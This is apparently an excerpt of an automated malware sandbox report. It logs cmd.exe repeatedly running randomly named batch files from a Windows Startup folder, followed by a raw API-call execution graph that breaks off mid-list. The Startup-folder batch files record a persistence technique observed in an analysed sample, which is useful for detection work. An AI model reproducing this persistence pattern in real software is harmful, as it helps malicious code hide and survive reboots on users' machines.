                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FLz6tWFKVQbppt2Sn3SWxNu4.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:34
                    Start time:15:22:04
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:35
                    Start time:15:22:13
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8NYZUwJycflpNiJIlSTOBho.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:36
                    Start time:15:22:13
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:37
                    Start time:15:22:26
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aPLL8m8adxhtzUUH2fMBYP78.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:38
                    Start time:15:22:26
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:39
                    Start time:15:22:35
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdci9HHJSUc0QT0L7qkU4ePj.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:40
                    Start time:15:22:35
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:41
                    Start time:15:22:43
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nGizfduNOl4JVOkYHOr4NIAN.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:42
                    Start time:15:22:43
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:43
                    Start time:15:22:51
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NtFoY6Vi2WtE4qAcwOzUXMHK.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:44
                    Start time:15:22:51
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:45
                    Start time:15:23:01
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:46
                    Start time:15:23:01
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:47
                    Start time:15:23:14
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C8TVyoaND4r7GWzWKeeVLeMP.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:48
                    Start time:15:23:14
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:49
                    Start time:15:23:23
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fKQUct9QxCcX5qlUcu38pRMl.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:50
                    Start time:15:23:23
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:51
                    Start time:15:23:32
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBNY7HBfHixtkjGDaljf7VCr.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:52
                    Start time:15:23:32
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:53
                    Start time:15:23:41
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jl2Nqcc7XWeOOYztXFcYbkmD.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:54
                    Start time:15:23:41
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:55
                    Start time:15:23:49
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:56
                    Start time:15:23:49
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:57
                    Start time:15:23:57
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OK2XFEh3D7xuLDF5l083mPKW.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:58
                    Start time:15:23:57
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:59
                    Start time:15:24:06
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p04DXHk7aV49bHDBuFA6B2XV.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:60
                    Start time:15:24:06
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7403e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:6.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:24.1%
                      Total number of Nodes:916
                      Total number of Limit Nodes:17
                      execution_graph 15960 7ff67dcba821 15961 7ff67dcba7f4 15960->15961 15962 7ff67dcba833 15960->15962 15967 7ff67dcc7651 15962->15967 15971 7ff67dcc74ce 15962->15971 15979 7ff67dcc74a0 15962->15979 15963 7ff67dcba854 15969 7ff67dcc7630 15967->15969 15968 7ff67dcc7519 15968->15963 15969->15967 15969->15968 15983 7ff67dcc9ec0 15969->15983 15972 7ff67dcc7535 15971->15972 15973 7ff67dcc750b 15971->15973 15993 7ff67dcccfb0 15972->15993 15975 7ff67dcc7514 DebugBreak 15973->15975 15976 7ff67dcc7519 15973->15976 15975->15976 15976->15963 15977 7ff67dcc7558 15977->15976 15978 7ff67dcc9ec0 3 API calls 15977->15978 15978->15976 15980 7ff67dcc7612 15979->15980 15981 7ff67dcc7519 15979->15981 15980->15981 15982 7ff67dcc9ec0 3 API calls 15980->15982 15981->15963 15982->15981 15984 7ff67dcc9ef6 15983->15984 15988 7ff67dcc9f2f 15983->15988 15985 7ff67dcc9f09 SwitchToThread 15984->15985 15984->15988 15990 7ff67dcc2960 15984->15990 15985->15984 15987 7ff67dcca005 ISource 15987->15968 15988->15987 15989 7ff67dcca000 DebugBreak 15988->15989 15989->15987 15991 7ff67dcc2964 SleepEx 15990->15991 15992 7ff67dcc296d 15990->15992 15991->15992 15992->15984 16002 7ff67dcccfdf 15993->16002 15994 7ff67dcd36f0 39 API calls 15994->16002 15995 7ff67dccd099 SwitchToThread 15995->16002 15999 7ff67dccd1bb 15999->15977 16000 7ff67dccd0c5 SwitchToThread 16000->16002 16001 7ff67dcc2960 SleepEx 16001->16002 16002->15994 16002->15995 16002->15999 16002->16000 16002->16001 16003 7ff67dcf0900 WaitForSingleObject 16002->16003 16004 7ff67dce4c10 GetTickCount64 16002->16004 16005 7ff67dccd08d SwitchToThread 16002->16005 16006 7ff67dccdc60 16002->16006 16026 7ff67dcf0740 16002->16026 16040 7ff67dccd6e0 16002->16040 16003->16002 16004->16002 16005->16002 16007 7ff67dccdc9c 16006->16007 16008 7ff67dccde52 16006->16008 16009 7ff67dccdd0d 16007->16009 16010 7ff67dccde57 16007->16010 16059 7ff67dceeb00 16008->16059 16013 7ff67dccdd1c SwitchToThread 16009->16013 16010->16008 16055 7ff67dcc7100 16010->16055 16016 7ff67dccdd2a 16013->16016 16014 7ff67dccddd1 SwitchToThread 16014->16016 16016->16008 16016->16014 16019 7ff67dccddfd SwitchToThread 16016->16019 16020 7ff67dcc2960 SleepEx 16016->16020 16024 7ff67dccddc5 SwitchToThread 16016->16024 16051 7ff67dcf0900 16016->16051 16019->16016 16020->16016 16024->16016 16027 7ff67dcf075d 16026->16027 16028 7ff67dcf08e9 16026->16028 16029 7ff67dcc2100 10 API calls 16027->16029 16028->16002 16030 7ff67dcf0784 16029->16030 16031 7ff67dcf08d7 16030->16031 16032 7ff67dcc7100 WaitForSingleObject 16030->16032 16031->16002 16038 7ff67dcf07bd 16032->16038 16033 7ff67dcf08c0 16033->16002 16034 7ff67dcf0849 SwitchToThread 16034->16038 16035 7ff67dcf0875 SwitchToThread 16035->16038 16036 7ff67dcc2960 SleepEx 16036->16038 16037 7ff67dcf0900 WaitForSingleObject 16037->16038 16038->16033 16038->16034 16038->16035 16038->16036 16038->16037 16039 7ff67dcf083d SwitchToThread 16038->16039 16039->16038 16041 7ff67dccd71c 16040->16041 16042 7ff67dccd88b 16040->16042 16041->16042 16043 7ff67dcc2960 SleepEx 16041->16043 16093 7ff67dcecc30 16042->16093 16049 7ff67dccd75f 16043->16049 16045 7ff67dccd80a SwitchToThread 16045->16049 16046 7ff67dccd836 SwitchToThread 16046->16049 16047 7ff67dcc2960 SleepEx 16047->16049 16048 7ff67dcf0900 WaitForSingleObject 16048->16049 16049->16042 16049->16045 16049->16046 16049->16047 16049->16048 16050 7ff67dccd7fe SwitchToThread 16049->16050 16050->16049 16053 7ff67dcf0916 16051->16053 16052 7ff67dcf094d 16052->16016 16053->16052 16062 7ff67dcc2cc0 WaitForSingleObject 16053->16062 16056 7ff67dcc7118 16055->16056 16063 7ff67dcc2cc0 WaitForSingleObject 16056->16063 16064 7ff67dccac70 16059->16064 16061 7ff67dceeb38 16061->16008 16065 7ff67dccacc7 16064->16065 16066 7ff67dccb07a 16065->16066 16072 7ff67dcee970 16065->16072 16066->16061 16069 7ff67dccafb1 16069->16066 16084 7ff67dcd2700 16069->16084 16070 7ff67dccadc5 _swprintf_c_l 16070->16069 16080 7ff67dce18c0 16070->16080 16073 7ff67dcee989 16072->16073 16074 7ff67dcee999 16072->16074 16073->16070 16075 7ff67dceeacb SwitchToThread 16074->16075 16076 7ff67dcee9e9 SwitchToThread 16074->16076 16077 7ff67dceead7 16074->16077 16078 7ff67dceea87 SwitchToThread 16074->16078 16079 7ff67dceea9c SwitchToThread 16074->16079 16075->16074 16076->16074 16077->16070 16078->16074 16079->16074 16081 7ff67dce18df 16080->16081 16083 7ff67dce194a _swprintf_c_l 16080->16083 16081->16083 16089 7ff67dcc2c50 VirtualAlloc 16081->16089 16083->16069 16085 7ff67dce18c0 2 API calls 16084->16085 16086 7ff67dcd2735 _swprintf_c_l 16085->16086 16087 7ff67dcee970 4 API calls 16086->16087 16088 7ff67dcd2885 16087->16088 16088->16066 16088->16088 16090 7ff67dcc2c9c 16089->16090 16091 7ff67dcc2c8b 16089->16091 16090->16083 16091->16090 16092 7ff67dcc2c90 VirtualUnlock 16091->16092 16092->16090 16094 7ff67dcecc6e 16093->16094 16096 7ff67dcecf07 _swprintf_c_l 16094->16096 16097 7ff67dcdd280 16094->16097 16096->16042 16107 7ff67dcdd120 16097->16107 16099 7ff67dcdd291 16100 7ff67dcdd376 DebugBreak 16099->16100 16102 7ff67dcdd339 DebugBreak 16099->16102 16103 7ff67dcdd3a8 16099->16103 16104 7ff67dcdd356 DebugBreak 16099->16104 16105 7ff67dcdd36d 16099->16105 16101 7ff67dcdd385 16100->16101 16101->16103 16106 7ff67dcdd399 DebugBreak 16101->16106 16102->16099 16103->16094 16104->16099 16105->16100 16105->16101 16106->16103 16108 7ff67dcdd142 16107->16108 16109 7ff67dcdd195 16108->16109 16111 7ff67dcdd1b0 16108->16111 16118 7ff67dccd290 16109->16118 16125 7ff67dcde820 16111->16125 16113 7ff67dcdd265 16113->16099 16114 7ff67dcdd1a8 16114->16113 16131 7ff67dcdf5d0 16114->16131 16117 7ff67dcdd222 EnterCriticalSection LeaveCriticalSection 16117->16114 16119 7ff67dccd2b9 16118->16119 16119->16119 16121 7ff67dccd3e7 16119->16121 16150 7ff67dce4cb0 16119->16150 16122 7ff67dccd56f 16121->16122 16154 7ff67dce16e0 16121->16154 16122->16114 16124 7ff67dccd596 16124->16114 16127 7ff67dcde851 16125->16127 16126 7ff67dcdd1d2 16126->16114 16126->16117 16127->16126 16128 7ff67dcde9d4 16127->16128 16129 7ff67dcde9cf DebugBreak 16127->16129 16128->16126 16130 7ff67dcde9e0 DebugBreak 16128->16130 16129->16128 16130->16126 16132 7ff67dcdf685 16131->16132 16133 7ff67dcdf5e9 16131->16133 16132->16113 16186 7ff67dcd3f90 16133->16186 16135 7ff67dcdf66b 16136 7ff67dcd6710 5 API calls 16135->16136 16138 7ff67dcdf678 16136->16138 16138->16113 16139 7ff67dcdf60c 16140 7ff67dcdf64e 16139->16140 16141 7ff67dcdf611 16139->16141 16142 7ff67dcd6710 5 API calls 16140->16142 16143 7ff67dcdf631 16141->16143 16144 7ff67dcdf616 16141->16144 16146 7ff67dcdf65e 16142->16146 16145 7ff67dcd6710 5 API calls 16143->16145 16192 7ff67dcd6710 16144->16192 16148 7ff67dcdf641 16145->16148 16146->16113 16148->16113 16149 7ff67dcdf624 16149->16113 16151 7ff67dce4cc9 16150->16151 16153 7ff67dce4d14 16150->16153 16151->16153 16168 7ff67dcdfb60 16151->16168 16153->16121 16155 7ff67dce170d 16154->16155 16156 7ff67dce1763 EnterCriticalSection 16155->16156 16157 7ff67dce17e7 16155->16157 16159 7ff67dce1780 16156->16159 16160 7ff67dce1841 16157->16160 16163 7ff67dcc29b0 3 API calls 16157->16163 16158 7ff67dce1831 LeaveCriticalSection 16164 7ff67dce183d 16158->16164 16159->16158 16162 7ff67dce17c5 LeaveCriticalSection 16159->16162 16161 7ff67dcde820 2 API calls 16160->16161 16161->16164 16162->16157 16165 7ff67dce180d 16163->16165 16164->16124 16165->16160 16166 7ff67dce1811 16165->16166 16166->16164 16167 7ff67dce181b EnterCriticalSection 16166->16167 16167->16158 16173 7ff67dcdfb8e 16168->16173 16169 7ff67dd19030 8 API calls 16170 7ff67dce002b 16169->16170 16170->16151 16171 7ff67dcdfb98 16171->16169 16172 7ff67dcdff43 EnterCriticalSection 16172->16173 16174 7ff67dcdff70 LeaveCriticalSection 16172->16174 16173->16171 16173->16172 16173->16174 16176 7ff67dce0061 LeaveCriticalSection 16173->16176 16177 7ff67dce0037 16173->16177 16182 7ff67dcc29b0 16173->16182 16174->16173 16179 7ff67dce006d 16176->16179 16178 7ff67dce0040 EnterCriticalSection 16177->16178 16177->16179 16178->16176 16179->16171 16181 7ff67dce00a5 EnterCriticalSection LeaveCriticalSection 16179->16181 16185 7ff67dcc2a40 VirtualFree 16179->16185 16181->16179 16183 7ff67dcc29ee GetCurrentProcess VirtualAllocExNuma 16182->16183 16184 7ff67dcc29cb VirtualAlloc 16182->16184 16183->16173 16184->16173 16185->16179 16187 7ff67dcd3fd0 16186->16187 16190 7ff67dcd4054 16186->16190 16187->16190 16200 7ff67dcd3e90 16187->16200 16190->16132 16190->16135 16190->16139 16191 7ff67dcd3e90 7 API calls 16191->16190 16193 7ff67dcd6747 16192->16193 16195 7ff67dcd6769 _swprintf_c_l 16193->16195 16210 7ff67dcf06b0 16193->16210 16196 7ff67dcd6850 16195->16196 16217 7ff67dcc2a40 VirtualFree 16195->16217 16196->16149 16198 7ff67dcd6815 16198->16196 16199 7ff67dcd6823 EnterCriticalSection LeaveCriticalSection 16198->16199 16199->16196 16201 7ff67dcd3ed3 EnterCriticalSection 16200->16201 16202 7ff67dcd3f21 16200->16202 16203 7ff67dcd3ef0 16201->16203 16204 7ff67dcd3efd LeaveCriticalSection 16201->16204 16205 7ff67dcc29b0 3 API calls 16202->16205 16203->16204 16206 7ff67dcd3f61 LeaveCriticalSection 16203->16206 16204->16202 16207 7ff67dcd3f32 16205->16207 16208 7ff67dcd3f6d 16206->16208 16207->16208 16209 7ff67dcd3f40 EnterCriticalSection 16207->16209 16208->16190 16208->16191 16209->16206 16218 7ff67dcc2a40 VirtualFree 16210->16218 16212 7ff67dcf06ca 16213 7ff67dcf0714 16212->16213 16214 7ff67dcf06db EnterCriticalSection 16212->16214 16213->16195 16215 7ff67dcf0705 LeaveCriticalSection 16214->16215 16216 7ff67dcf06fe 16214->16216 16215->16213 16216->16215 16217->16198 16218->16212 16219 7ff67dcb57e0 16247 7ff67dcbb0a0 FlsAlloc 16219->16247 16221 7ff67dcb594e 16222 7ff67dcb57eb 16222->16221 16260 7ff67dcbaf40 GetModuleHandleExW 16222->16260 16224 7ff67dcb580b 16261 7ff67dcb7190 16224->16261 16226 7ff67dcb5813 16226->16221 16269 7ff67dcbb7d0 16226->16269 16230 7ff67dcb5830 16230->16221 16231 7ff67dcb586c 16230->16231 16306 7ff67dcbd830 16230->16306 16233 7ff67dcb58a5 16231->16233 16234 7ff67dcbd830 9 API calls 16231->16234 16235 7ff67dcb58ff 16233->16235 16283 7ff67dcbdfa0 16233->16283 16234->16233 16291 7ff67dcb9fc0 16235->16291 16238 7ff67dcb5904 16238->16221 16312 7ff67dcb5490 16238->16312 16248 7ff67dcbb0c0 16247->16248 16249 7ff67dcbb1ee 16247->16249 16323 7ff67dcc3990 16248->16323 16249->16222 16251 7ff67dcbb0c5 16252 7ff67dcc2730 10 API calls 16251->16252 16253 7ff67dcbb0ca 16252->16253 16253->16249 16254 7ff67dcbd830 9 API calls 16253->16254 16255 7ff67dcbb0f2 16254->16255 16256 7ff67dcbb11a GetCurrentProcess GetProcessAffinityMask 16255->16256 16258 7ff67dcbb111 16255->16258 16259 7ff67dcbb188 16255->16259 16256->16258 16257 7ff67dcbb164 QueryInformationJobObject 16257->16259 16258->16257 16259->16222 16260->16224 16462 7ff67dd19050 16261->16462 16264 7ff67dcb71e4 16264->16226 16266 7ff67dcb71b2 16266->16264 16267 7ff67dcbb490 InitializeCriticalSectionEx 16266->16267 16268 7ff67dcb71dd 16267->16268 16268->16226 16270 7ff67dcbb490 InitializeCriticalSectionEx 16269->16270 16271 7ff67dcb5820 16270->16271 16271->16221 16272 7ff67dcb6bd0 16271->16272 16273 7ff67dd19050 _swprintf_c_l 3 API calls 16272->16273 16274 7ff67dcb6bee 16273->16274 16275 7ff67dcb6c8a 16274->16275 16490 7ff67dcb4de0 16274->16490 16275->16230 16277 7ff67dcb6c20 16278 7ff67dcb6c6a 16277->16278 16497 7ff67dcb4ed0 16277->16497 16278->16230 16280 7ff67dcb6c2d 16282 7ff67dcb6c3d ISource 16280->16282 16501 7ff67dcb4c60 16280->16501 16282->16230 16284 7ff67dcbe076 16283->16284 16285 7ff67dcbdfcb 16283->16285 16284->16235 16286 7ff67dd19050 _swprintf_c_l 3 API calls 16285->16286 16287 7ff67dcbdfea 16286->16287 16288 7ff67dcbb490 InitializeCriticalSectionEx 16287->16288 16289 7ff67dcbe015 16288->16289 16290 7ff67dcbe05e GetSystemTimeAsFileTime 16289->16290 16290->16284 16292 7ff67dd18a2b 16291->16292 16293 7ff67dcb9ff9 EventRegister 16292->16293 16294 7ff67dcba07c 16293->16294 16298 7ff67dcba077 16293->16298 16295 7ff67dcbd830 9 API calls 16294->16295 16295->16298 16506 7ff67dcba8a0 16298->16506 16299 7ff67dcba0f4 16299->16238 16300 7ff67dcba0cb 16300->16299 16524 7ff67dcb69e0 16300->16524 16302 7ff67dcba0d4 16302->16299 16531 7ff67dcbea50 16302->16531 16303 7ff67dcba0e4 16303->16238 16309 7ff67dcbd8a0 16306->16309 16307 7ff67dcbd920 _wcsicmp 16307->16309 16311 7ff67dcbd93d 16307->16311 16308 7ff67dd19030 8 API calls 16310 7ff67dcbda1d 16308->16310 16309->16307 16309->16311 16310->16231 16311->16308 16316 7ff67dcb54ba 16312->16316 16320 7ff67dcb561b 16312->16320 16313 7ff67dcb57a6 16313->16221 16321 7ff67dcbb490 16313->16321 16315 7ff67dcb579a RaiseFailFastException 16315->16313 16316->16320 16766 7ff67dcbb250 LoadLibraryExW 16316->16766 16318 7ff67dcb5596 16318->16320 16769 7ff67dcbb200 LoadLibraryExW 16318->16769 16320->16313 16772 7ff67dcbb2a0 16320->16772 16322 7ff67dd18c5f InitializeCriticalSectionEx 16321->16322 16450 7ff67dcb9c10 16323->16450 16326 7ff67dcb9c10 9 API calls 16327 7ff67dcc39ce 16326->16327 16328 7ff67dcb9c10 9 API calls 16327->16328 16329 7ff67dcc39e9 16328->16329 16330 7ff67dcb9c10 9 API calls 16329->16330 16331 7ff67dcc3a04 16330->16331 16332 7ff67dcb9c10 9 API calls 16331->16332 16333 7ff67dcc3a24 16332->16333 16334 7ff67dcb9c10 9 API calls 16333->16334 16335 7ff67dcc3a3f 16334->16335 16336 7ff67dcb9c10 9 API calls 16335->16336 16337 7ff67dcc3a5f 16336->16337 16338 7ff67dcb9c10 9 API calls 16337->16338 16339 7ff67dcc3a7a 16338->16339 16340 7ff67dcb9c10 9 API calls 16339->16340 16341 7ff67dcc3a95 16340->16341 16342 7ff67dcb9c10 9 API calls 16341->16342 16343 7ff67dcc3ab0 